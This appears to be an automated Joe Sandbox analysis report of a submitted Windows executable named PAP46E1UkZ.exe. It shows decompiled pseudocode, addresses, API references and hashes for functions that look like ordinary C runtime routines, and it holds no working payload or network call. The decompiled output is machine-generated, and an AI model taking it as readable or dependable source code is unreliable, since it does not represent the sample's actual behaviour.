                                                                                                                                                                                                                              0x7ff735c64d6e
                                                                                                                                                                                                                              0x7ff735c64d78
                                                                                                                                                                                                                              0x7ff735c64d7c
                                                                                                                                                                                                                              0x7ff735c64d83
                                                                                                                                                                                                                              0x7ff735c64d8a
                                                                                                                                                                                                                              0x7ff735c64d91
                                                                                                                                                                                                                              0x7ff735c64d95
                                                                                                                                                                                                                              0x7ff735c64d99
                                                                                                                                                                                                                              0x7ff735c64d9c
                                                                                                                                                                                                                              0x7ff735c64da6
                                                                                                                                                                                                                              0x7ff735c64da8
                                                                                                                                                                                                                              0x7ff735c64db2
                                                                                                                                                                                                                              0x7ff735c64dba
                                                                                                                                                                                                                              0x7ff735c64dc8
                                                                                                                                                                                                                              0x7ff735c64dce
                                                                                                                                                                                                                              0x7ff735c64dd0
                                                                                                                                                                                                                              0x7ff735c64dda
                                                                                                                                                                                                                              0x7ff735c64ddc
                                                                                                                                                                                                                              0x7ff735c64de4
                                                                                                                                                                                                                              0x7ff735c64de9
                                                                                                                                                                                                                              0x7ff735c64deb
                                                                                                                                                                                                                              0x7ff735c64df2
                                                                                                                                                                                                                              0x7ff735c64df6
                                                                                                                                                                                                                              0x7ff735c64df8
                                                                                                                                                                                                                              0x7ff735c64dfd
                                                                                                                                                                                                                              0x7ff735c64e02
                                                                                                                                                                                                                              0x7ff735c64e06
                                                                                                                                                                                                                              0x7ff735c64e0a
                                                                                                                                                                                                                              0x7ff735c64e0c
                                                                                                                                                                                                                              0x7ff735c64e0f
                                                                                                                                                                                                                              0x7ff735c64e13
                                                                                                                                                                                                                              0x7ff735c64e15
                                                                                                                                                                                                                              0x7ff735c64e1e
                                                                                                                                                                                                                              0x7ff735c64e20
                                                                                                                                                                                                                              0x7ff735c64e25
                                                                                                                                                                                                                              0x7ff735c64e2b
                                                                                                                                                                                                                              0x7ff735c64e2d
                                                                                                                                                                                                                              0x7ff735c64e47

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.454572575.00007FF735C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF735C40000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454563406.00007FF735C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454600190.00007FF735C69000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454618472.00007FF735C7B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454618472.00007FF735C8A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454637784.00007FF735C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454637784.00007FF735C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff735c40000_PAP46E1UkZ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _invalid_parameter_noinfo$_get_daylight
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 72036449-0
                                                                                                                                                                                                                              • Opcode ID: e92b010ba05dd5979a774d0d5dfe2197f1f9ca8a50ce478a8b2822c72b33b66b
                                                                                                                                                                                                                              • Instruction ID: 8316674adcf000ee66c1c399e8124f3a8b838702387202419c8632c56a719c40
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e92b010ba05dd5979a774d0d5dfe2197f1f9ca8a50ce478a8b2822c72b33b66b
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0C51B133D0C20366F3656A28D0D53FAF691AF40F1CF9D4634DA498B2D5CE2CEA40E661
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 00007FF735C42020 Relevance: 6.1, APIs: 4, Instructions: 52COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.454572575.00007FF735C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF735C40000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454563406.00007FF735C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454600190.00007FF735C69000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454618472.00007FF735C7B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454618472.00007FF735C8A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454637784.00007FF735C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454637784.00007FF735C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff735c40000_PAP46E1UkZ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: LongWindow$DialogInvalidateRect
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1956198572-0
                                                                                                                                                                                                                              • Opcode ID: 8c39408b03b954b745a1ef83f47e9cc5920fe7de0caada06e768c3f47d5bd573
                                                                                                                                                                                                                              • Instruction ID: bbfc2e00c7f3caddfc6fa5044ddc727c3f6d8567b0d9655e5c57253e5f3265ef
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8c39408b03b954b745a1ef83f47e9cc5920fe7de0caada06e768c3f47d5bd573
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 31112972A0815352F755AB6AE5456B9D2A2EB84F84FC89030DA4A03BCDCD2CD5C5E210
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 00007FF735C63F00 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 121COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              C-Code - Quality: 58%
                                                                                                                                                                                                                              			E00007FF77FF735C63F00(void* __ebx, void* __rax, long long __rbx, void* __rcx, void* __rdx, long long __rsi, long long __r8, void* __r9, void* __r10, long long _a8, long long _a16) {
				char _v16;
				intOrPtr _v32;
				char _v40;
				signed long long _v48;
				signed long long _v56;
				intOrPtr _v64;
				long long _v72;
				void* _t28;
				void* _t29;
				long long _t57;

				_t29 = __ebx;
				_a8 = __rbx;
				_a16 = __rsi;
				_t57 = __r8;
				if (E00007FF77FF735C5FE18(__rax, __r9, __rdx, __rdx, __r8, __rcx, __r9) != 0) goto 0x35c63fcd;
				E00007FF77FF735C540F0(__rax, __r9,  &_v40, __rdx, __r8);
				if ( *((intOrPtr*)(_v32 + 0xc)) != 0xfde9) goto 0x35c63f60;
				if (_v16 == 0) goto 0x35c63f97;
				 *(_v40 + 0x3a8) =  *(_v40 + 0x3a8) & 0xfffffffd;
				goto 0x35c63f97;
				_t28 = E00007FF77FF735C5D660(_v16, _v40);
				if (_t28 != 0) goto 0x35c63f82;
				if (_v16 == _t28) goto 0x35c63f7b;
				 *(_v40 + 0x3a8) =  *(_v40 + 0x3a8) & 0xfffffffd;
				goto 0x35c63f97;
				if (_v16 == 0) goto 0x35c63f95;
				 *(_v40 + 0x3a8) =  *(_v40 + 0x3a8) & 0xfffffffd;
				_v48 = _v48 & 0x00000000;
				r9d = _t29;
				_v56 = _v56 & 0x00000000;
				_v64 = 0x3f;
				_v72 = _t57;
				E00007FF77FF735C5E704();
				return _t28;
			}













                                                                                                                                                                                                                              0x7ff735c63f00
                                                                                                                                                                                                                              0x7ff735c63f00
                                                                                                                                                                                                                              0x7ff735c63f05
                                                                                                                                                                                                                              0x7ff735c63f12
                                                                                                                                                                                                                              0x7ff735c63f2c
                                                                                                                                                                                                                              0x7ff735c63f37
                                                                                                                                                                                                                              0x7ff735c63f49
                                                                                                                                                                                                                              0x7ff735c63f50
                                                                                                                                                                                                                              0x7ff735c63f57
                                                                                                                                                                                                                              0x7ff735c63f5e
                                                                                                                                                                                                                              0x7ff735c63f60
                                                                                                                                                                                                                              0x7ff735c63f67
                                                                                                                                                                                                                              0x7ff735c63f6d
                                                                                                                                                                                                                              0x7ff735c63f74
                                                                                                                                                                                                                              0x7ff735c63f80
                                                                                                                                                                                                                              0x7ff735c63f87
                                                                                                                                                                                                                              0x7ff735c63f8e
                                                                                                                                                                                                                              0x7ff735c63f97
                                                                                                                                                                                                                              0x7ff735c63f9d
                                                                                                                                                                                                                              0x7ff735c63fa0
                                                                                                                                                                                                                              0x7ff735c63fa9
                                                                                                                                                                                                                              0x7ff735c63fb3
                                                                                                                                                                                                                              0x7ff735c63fb8
                                                                                                                                                                                                                              0x7ff735c63fcc

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.454572575.00007FF735C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF735C40000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454563406.00007FF735C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454600190.00007FF735C69000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454618472.00007FF735C7B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454618472.00007FF735C8A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454637784.00007FF735C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454637784.00007FF735C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff735c40000_PAP46E1UkZ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _get_daylight$_invalid_parameter_noinfo
                                                                                                                                                                                                                              • String ID: ?
                                                                                                                                                                                                                              • API String ID: 1286766494-1684325040
                                                                                                                                                                                                                              • Opcode ID: 29f4d5a5d5edd35705e3af878b46c842b0a5a6bb0ad0988d603b769be33e3e79
                                                                                                                                                                                                                              • Instruction ID: f2788d07306d653bd51e04593268c3bba04e5e4b71b8323ed3911102c8684866
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 29f4d5a5d5edd35705e3af878b46c842b0a5a6bb0ad0988d603b769be33e3e79
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8C41F513A1828366FB24AB26E4453BAE660EB80FA8F584335EE5D07AD5DF3CD541D710
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 00007FF735C5746C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 111COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              C-Code - Quality: 54%
                                                                                                                                                                                                                              			E00007FF77FF735C5746C(void* __ecx, intOrPtr* __rax, long long __rbx, void* __rcx, void* __r8, long long _a8, signed int _a16, signed int _a24, signed int _a32) {
				long long _v56;
				void* __rdi;
				void* __rsi;
				void* __r14;
				void* _t30;
				intOrPtr _t36;
				intOrPtr _t42;
				intOrPtr* _t65;
				long long _t71;
				void* _t73;
				long long _t87;
				signed int _t88;
				intOrPtr* _t89;
				void* _t99;

				_t73 = __rcx;
				_a8 = __rbx;
				r14d = __ecx;
				if (__ecx == 0) goto 0x35c575db;
				_t2 = _t73 - 1; // -1
				if (_t2 - 1 <= 0) goto 0x35c574aa;
				E00007FF77FF735C53B18(__rax);
				_t3 = _t88 + 0x16; // 0x16
				_t42 = _t3;
				 *__rax = _t42;
				E00007FF77FF735C59400();
				goto 0x35c575db;
				r8d = 0x104;
				GetModuleFileNameW(??, ??, ??);
				_t89 =  *0x35c8a758; // 0x29361992244
				 *0x35c8a730 = 0x35c8a7b0;
				if (_t89 == 0) goto 0x35c574da;
				if ( *_t89 != _t42) goto 0x35c574dd;
				_t65 =  &_a32;
				_a24 = _t88;
				_v56 = _t65;
				r8d = 0;
				_a32 = _t88;
				_t30 = E00007FF77FF735C57268(0x35c8a7b0, 0x35c8a7b0, 0x35c8a7b0, _t88, 0x35c8a7b0, __r8,  &_a24, _t99);
				r8d = 2;
				E00007FF77FF735C5740C(_t30, _a24, _a32, __r8);
				_t71 = _t65;
				if (_t65 != 0) goto 0x35c57535;
				E00007FF77FF735C53B18(_t65);
				 *_t65 = 0xc;
				E00007FF77FF735C59468(_t65, _a24);
				goto 0x35c574a3;
				_v56 =  &_a32;
				E00007FF77FF735C57268(_t71, 0x35c8a7b0, _t71, _t88, 0x35c8a7b0, _t65 + _a24 * 8,  &_a24, _t99);
				if (r14d != 1) goto 0x35c5756d;
				_t36 = _a24 - 1;
				 *0x35c8a748 = _t71;
				 *0x35c8a738 = _t36;
				goto 0x35c575d6;
				_a16 = _t88;
				0x35c604a4();
				if (_t36 == 0) goto 0x35c5759c;
				E00007FF77FF735C59468( &_a32, _a16);
				_a16 = _t88;
				E00007FF77FF735C59468( &_a32, _t71);
				goto 0x35c575db;
				_t87 = _a16;
				if ( *_t87 == _t88) goto 0x35c575b7;
				if ( *((intOrPtr*)(_t87 + 8)) != _t88) goto 0x35c575ab;
				 *0x35c8a738 = 0;
				_a16 = _t88;
				 *0x35c8a748 = _t87;
				E00007FF77FF735C59468(_t87 + 8, _t88 + 1);
				_a16 = _t88;
				E00007FF77FF735C59468(_t87 + 8, _t71);
				return _t36;
			}

















                                                                                                                                                                                                                              0x7ff735c5746c
                                                                                                                                                                                                                              0x7ff735c5746c
                                                                                                                                                                                                                              0x7ff735c57481
                                                                                                                                                                                                                              0x7ff735c57486
                                                                                                                                                                                                                              0x7ff735c5748c
                                                                                                                                                                                                                              0x7ff735c57492
                                                                                                                                                                                                                              0x7ff735c57494
                                                                                                                                                                                                                              0x7ff735c57499
                                                                                                                                                                                                                              0x7ff735c57499
                                                                                                                                                                                                                              0x7ff735c5749c
                                                                                                                                                                                                                              0x7ff735c5749e
                                                                                                                                                                                                                              0x7ff735c574a5
                                                                                                                                                                                                                              0x7ff735c574b1
                                                                                                                                                                                                                              0x7ff735c574bc
                                                                                                                                                                                                                              0x7ff735c574c2
                                                                                                                                                                                                                              0x7ff735c574c9
                                                                                                                                                                                                                              0x7ff735c574d3
                                                                                                                                                                                                                              0x7ff735c574d8
                                                                                                                                                                                                                              0x7ff735c574dd
                                                                                                                                                                                                                              0x7ff735c574e1
                                                                                                                                                                                                                              0x7ff735c574e9
                                                                                                                                                                                                                              0x7ff735c574ee
                                                                                                                                                                                                                              0x7ff735c574f1
                                                                                                                                                                                                                              0x7ff735c574fa
                                                                                                                                                                                                                              0x7ff735c57503
                                                                                                                                                                                                                              0x7ff735c57510
                                                                                                                                                                                                                              0x7ff735c57515
                                                                                                                                                                                                                              0x7ff735c5751b
                                                                                                                                                                                                                              0x7ff735c5751d
                                                                                                                                                                                                                              0x7ff735c57529
                                                                                                                                                                                                                              0x7ff735c5752b
                                                                                                                                                                                                                              0x7ff735c57530
                                                                                                                                                                                                                              0x7ff735c57547
                                                                                                                                                                                                                              0x7ff735c5754c
                                                                                                                                                                                                                              0x7ff735c57555
                                                                                                                                                                                                                              0x7ff735c5755a
                                                                                                                                                                                                                              0x7ff735c5755c
                                                                                                                                                                                                                              0x7ff735c57563
                                                                                                                                                                                                                              0x7ff735c5756b
                                                                                                                                                                                                                              0x7ff735c57571
                                                                                                                                                                                                                              0x7ff735c57578
                                                                                                                                                                                                                              0x7ff735c57581
                                                                                                                                                                                                                              0x7ff735c57587
                                                                                                                                                                                                                              0x7ff735c5758f
                                                                                                                                                                                                                              0x7ff735c57593
                                                                                                                                                                                                                              0x7ff735c5759a
                                                                                                                                                                                                                              0x7ff735c5759c
                                                                                                                                                                                                                              0x7ff735c575a9
                                                                                                                                                                                                                              0x7ff735c575b5
                                                                                                                                                                                                                              0x7ff735c575b7
                                                                                                                                                                                                                              0x7ff735c575bf
                                                                                                                                                                                                                              0x7ff735c575c3
                                                                                                                                                                                                                              0x7ff735c575ca
                                                                                                                                                                                                                              0x7ff735c575d2
                                                                                                                                                                                                                              0x7ff735c575d6
                                                                                                                                                                                                                              0x7ff735c575ed

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • _invalid_parameter_noinfo.LIBCMT ref: 00007FF735C5749E
                                                                                                                                                                                                                                • Part of subcall function 00007FF735C59468: RtlReleasePrivilege.NTDLL(?,?,?,00007FF735C6138E,?,?,?,00007FF735C613CB,?,?,00000000,00007FF735C6189C,?,?,?,00007FF735C617CF), ref: 00007FF735C5947E
                                                                                                                                                                                                                                • Part of subcall function 00007FF735C59468: GetLastError.KERNEL32(?,?,?,00007FF735C6138E,?,?,?,00007FF735C613CB,?,?,00000000,00007FF735C6189C,?,?,?,00007FF735C617CF), ref: 00007FF735C59488
                                                                                                                                                                                                                              • GetModuleFileNameW.KERNEL32(?,?,?,?,?,00007FF735C4A485), ref: 00007FF735C574BC
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.454572575.00007FF735C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF735C40000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454563406.00007FF735C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454600190.00007FF735C69000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454618472.00007FF735C7B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454618472.00007FF735C8A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454637784.00007FF735C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454637784.00007FF735C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff735c40000_PAP46E1UkZ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ErrorFileLastModuleNamePrivilegeRelease_invalid_parameter_noinfo
                                                                                                                                                                                                                              • String ID: C:\Users\user\Desktop\PAP46E1UkZ.exe
                                                                                                                                                                                                                              • API String ID: 1752791759-2912286821
                                                                                                                                                                                                                              • Opcode ID: fa9df641b0395c6933c6b8217d44b6202fc788f94bc61a6e31d0565e9d3514d1
                                                                                                                                                                                                                              • Instruction ID: 6c476618f4b88c91ff7d8f6b5be0d7f867a24846fdf54cb21be11b675bf19109
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: fa9df641b0395c6933c6b8217d44b6202fc788f94bc61a6e31d0565e9d3514d1
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 46416DB3A08B13A5EB15AF6698401B8A7E5EB44FD8BD44435E94E43B85DF3CE481E360
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 00007FF735C5B77C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              C-Code - Quality: 29%
                                                                                                                                                                                                                              			E00007FF77FF735C5B77C(signed int __edx, void* __edi, void* __rax, signed long long __rbx, intOrPtr* __rcx, long long __rbp, signed short* __r8, void* __r10, void* __r11, signed long long _a8, signed long long _a16, long long _a24, char _a40, char _a1744, char _a1752, signed int _a5176, void* _a5192) {
				intOrPtr _v0;
				signed long long _v8;
				signed int _t41;
				signed long long _t62;
				short* _t67;
				signed int* _t68;
				void* _t91;
				void* _t102;
				void* _t103;

				_a8 = __rbx;
				_a24 = __rbp;
				E00007FF77FF735C4A3B0(0x1470, __rax, __r10, __r11);
				_t62 =  *0x35c7b008; // 0x861d85c91f07
				_a5176 = _t62 ^ _t91 - __rax;
				r14d = r9d;
				r10d = r10d & 0x0000003f;
				_t103 = _t102 + __r8;
				 *((long long*)(__rcx)) =  *((intOrPtr*)(0x35c8aa40 + (__edx >> 6) * 8));
				 *((intOrPtr*)(__rcx + 8)) = 0;
				if (__r8 - _t103 >= 0) goto 0x35c5b8bd;
				_t67 =  &_a40;
				if (__r8 - _t103 >= 0) goto 0x35c5b826;
				_t41 =  *__r8 & 0x0000ffff;
				if (_t41 != 0xa) goto 0x35c5b812;
				 *_t67 = 0xd;
				_t68 = _t67 + 2;
				 *_t68 = _t41;
				if ( &(_t68[0]) -  &_a1744 < 0) goto 0x35c5b7f4;
				_a16 = _a16 & 0x00000000;
				_a8 = _a8 & 0x00000000;
				_v0 = 0xd55;
				_v8 =  &_a1752;
				r9d = 0;
				E00007FF77FF735C5E704();
				if (0 == 0) goto 0x35c5b8b5;
				if (0 == 0) goto 0x35c5b8a5;
				_v8 = _v8 & 0x00000000;
				r8d = 0;
				r8d = r8d;
				if (WriteFile(??, ??, ??, ??, ??) == 0) goto 0x35c5b8b5;
				if (0 + _a24 < 0) goto 0x35c5b872;
				 *((intOrPtr*)(__rcx + 4)) = __edi - r15d;
				goto 0x35c5b7e9;
				 *((intOrPtr*)(__rcx)) = GetLastError();
				return E00007FF77FF735C4A410(_t39, 0, _a5176 ^ _t91 - __rax);
			}












                                                                                                                                                                                                                              0x7ff735c5b77c
                                                                                                                                                                                                                              0x7ff735c5b781
                                                                                                                                                                                                                              0x7ff735c5b793
                                                                                                                                                                                                                              0x7ff735c5b79b
                                                                                                                                                                                                                              0x7ff735c5b7a5
                                                                                                                                                                                                                              0x7ff735c5b7b6
                                                                                                                                                                                                                              0x7ff735c5b7c4
                                                                                                                                                                                                                              0x7ff735c5b7c8
                                                                                                                                                                                                                              0x7ff735c5b7e0
                                                                                                                                                                                                                              0x7ff735c5b7e6
                                                                                                                                                                                                                              0x7ff735c5b7e9
                                                                                                                                                                                                                              0x7ff735c5b7ef
                                                                                                                                                                                                                              0x7ff735c5b7f7
                                                                                                                                                                                                                              0x7ff735c5b7f9
                                                                                                                                                                                                                              0x7ff735c5b804
                                                                                                                                                                                                                              0x7ff735c5b80b
                                                                                                                                                                                                                              0x7ff735c5b80e
                                                                                                                                                                                                                              0x7ff735c5b812
                                                                                                                                                                                                                              0x7ff735c5b824
                                                                                                                                                                                                                              0x7ff735c5b826
                                                                                                                                                                                                                              0x7ff735c5b831
                                                                                                                                                                                                                              0x7ff735c5b83f
                                                                                                                                                                                                                              0x7ff735c5b852
                                                                                                                                                                                                                              0x7ff735c5b857
                                                                                                                                                                                                                              0x7ff735c5b861
                                                                                                                                                                                                                              0x7ff735c5b86a
                                                                                                                                                                                                                              0x7ff735c5b870
                                                                                                                                                                                                                              0x7ff735c5b872
                                                                                                                                                                                                                              0x7ff735c5b887
                                                                                                                                                                                                                              0x7ff735c5b890
                                                                                                                                                                                                                              0x7ff735c5b89b
                                                                                                                                                                                                                              0x7ff735c5b8a3
                                                                                                                                                                                                                              0x7ff735c5b8aa
                                                                                                                                                                                                                              0x7ff735c5b8b0
                                                                                                                                                                                                                              0x7ff735c5b8bb
                                                                                                                                                                                                                              0x7ff735c5b8eb

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.454572575.00007FF735C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF735C40000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454563406.00007FF735C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454600190.00007FF735C69000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454618472.00007FF735C7B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454618472.00007FF735C8A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454637784.00007FF735C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454637784.00007FF735C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff735c40000_PAP46E1UkZ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ErrorFileLastWrite
                                                                                                                                                                                                                              • String ID: U
                                                                                                                                                                                                                              • API String ID: 442123175-4171548499
                                                                                                                                                                                                                              • Opcode ID: 7cfc60d03e1c1fb1421f5ee2d076ce7e908e8ae59bfe650375795ef28cb3fc2d
                                                                                                                                                                                                                              • Instruction ID: 25df41aa312759724bdfb25dbe3feaef7332d646fc0ff4ef835e5573bd220385
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7cfc60d03e1c1fb1421f5ee2d076ce7e908e8ae59bfe650375795ef28cb3fc2d
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4D41D473A18A4392EB109F66E4443B9A761FB88B98F845431EE4E87784DF3CD441D710
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 00007FF735C5DB88 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              C-Code - Quality: 72%
                                                                                                                                                                                                                              			E00007FF77FF735C5DB88(long long __rbx, void* __rdx, long long __rsi, void* __r8, long long _a8, long long _a16) {
				void* _v8;
				signed int _v24;
				short _v550;
				signed int _v552;
				void* _t19;
				void* _t40;
				signed long long _t56;
				signed long long _t57;
				signed short* _t59;
				signed short* _t61;
				void* _t70;

				_a8 = __rbx;
				_a16 = __rsi;
				_t56 =  *0x35c7b008; // 0x861d85c91f07
				_t57 = _t56 ^ _t70 - 0x00000240;
				_v24 = _t57;
				_t61 =  &_v552;
				r8d = 0x20a;
				E00007FF77FF735C4B800(_t19, 0, _t61, __rdx, __r8);
				if (GetCurrentDirectoryW(??, ??) - 0x104 > 0) goto 0x35c5dbfc;
				if (_v552 == 0) goto 0x35c5dc57;
				if (_v550 != 0x3a) goto 0x35c5dc57;
				_t39 =  >  ? _v552 & 0x0000ffff : _t61 - 0x20;
				_t40 = ( >  ? _v552 & 0x0000ffff : _t61 - 0x20) - 0x40;
				goto 0x35c5dc57;
				E00007FF77FF735C5D3D0(_t61 - 0x61, _t61,  &_v552);
				_t59 = _t57;
				if (_t57 == 0) goto 0x35c5dc24;
				if (GetCurrentDirectoryW(??, ??) != 0) goto 0x35c5dc31;
				E00007FF77FF735C53B18(_t57);
				 *_t57 = 0xc;
				goto 0x35c5dc4f;
				if ( *_t59 == 0) goto 0x35c5dc4f;
				if (_t59[1] != 0x3a) goto 0x35c5dc4f;
				_t43 =  >  ?  *_t59 & 0x0000ffff : _t61 - 0x20;
				_t44 = ( >  ?  *_t59 & 0x0000ffff : _t61 - 0x20) - 0x40;
				E00007FF77FF735C59468(_t57, _t59);
				_t28 = ( >  ?  *_t59 & 0x0000ffff : _t61 - 0x20) - 0x40;
				return E00007FF77FF735C4A410(( >  ?  *_t59 & 0x0000ffff : _t61 - 0x20) - 0x40,  *_t59 & 0x0000ffff, _v24 ^ _t70 - 0x00000240);
			}














                                                                                                                                                                                                                              0x7ff735c5db88
                                                                                                                                                                                                                              0x7ff735c5db8d
                                                                                                                                                                                                                              0x7ff735c5db9a
                                                                                                                                                                                                                              0x7ff735c5dba1
                                                                                                                                                                                                                              0x7ff735c5dba4
                                                                                                                                                                                                                              0x7ff735c5dbae
                                                                                                                                                                                                                              0x7ff735c5dbb3
                                                                                                                                                                                                                              0x7ff735c5dbb9
                                                                                                                                                                                                                              0x7ff735c5dbd3
                                                                                                                                                                                                                              0x7ff735c5dbdc
                                                                                                                                                                                                                              0x7ff735c5dbe4
                                                                                                                                                                                                                              0x7ff735c5dbf4
                                                                                                                                                                                                                              0x7ff735c5dbf7
                                                                                                                                                                                                                              0x7ff735c5dbfa
                                                                                                                                                                                                                              0x7ff735c5dc06
                                                                                                                                                                                                                              0x7ff735c5dc0d
                                                                                                                                                                                                                              0x7ff735c5dc13
                                                                                                                                                                                                                              0x7ff735c5dc22
                                                                                                                                                                                                                              0x7ff735c5dc24
                                                                                                                                                                                                                              0x7ff735c5dc29
                                                                                                                                                                                                                              0x7ff735c5dc2f
                                                                                                                                                                                                                              0x7ff735c5dc34
                                                                                                                                                                                                                              0x7ff735c5dc3b
                                                                                                                                                                                                                              0x7ff735c5dc49
                                                                                                                                                                                                                              0x7ff735c5dc4c
                                                                                                                                                                                                                              0x7ff735c5dc52
                                                                                                                                                                                                                              0x7ff735c5dc57
                                                                                                                                                                                                                              0x7ff735c5dc7d

                                                                                                                                                                                                                              APIs
